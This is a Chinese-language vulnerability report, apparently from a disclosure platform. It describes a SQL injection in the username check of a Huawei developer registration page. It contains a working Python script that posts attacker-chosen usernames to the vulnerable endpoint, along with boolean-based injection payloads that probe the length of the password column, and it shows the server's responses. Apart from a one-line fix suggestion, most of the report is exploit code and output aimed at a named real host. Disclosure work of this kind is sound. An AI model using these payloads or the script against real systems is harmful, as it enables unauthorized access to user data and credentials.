作者：  Matrix
简要描述：
华为智慧云存在SQL注入，理论上可修改后台数据
详细说明：
http://developer.huaweidevice.com/dev_creg.php

用户名验证POST数据不严格，提交地址 /dev_creg/preg.php?ckuser=1

参考如下测试脚本：
import httplib, urllib

import sys

 

if len(sys.argv) < 2:

    exit(0)

 

headers = {

    "Accept": "*/*",

    "Accept-Language": "zh-CN,zh;q=0.8",

    "Referer": "http://developer.huaweidevice.com/dev_creg.php",

    "User-Agent": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.1 (KHTML, like Gecko) www.2cto.com Chrome/13.0.782.112 Safari/535.1",

    "Content-Type": "application/x-www-form-urlencoded",

    "X-Requested-With": "XMLHttpRequest",

   

}

params=urllib.urlencode({

    "username": sys.argv[1],

})

conn = httplib.HTTPConnection('developer.huaweidevice.com')

conn.request("POST", "/dev_creg/preg.php?ckuser=1", params, headers)

 

response = conn.getresponse()

data = response.read()

try:

    print data.decode("utf-8")

except Exception:

    print dat
漏洞证明：
test.py ".a'"
返回错误信息：<b>SQL</b>: select uid from [Table]members where username='.a'' <br />

D:\>test.py ".a'or'1'='1"
{"code":0,"msg":"昵称不合法或者已存在"}

后台有简单过滤遇到空格会截断。

D:\>test.py ".a'or(length(password)=32)or'2'='1"
{"code":0,"msg":"昵称不合法或者已存在"}

D:\>test.py ".a'or(length(password)=31)or'2'='1"
{"code":1,"msg":"恭喜该名字可以注册!"}

D:\>test.py ".a'or(length(password)=33)or'2'='1"
{"code":1,"msg":"恭喜该名字可以注册!"}
修复方案：
建议做SQL过滤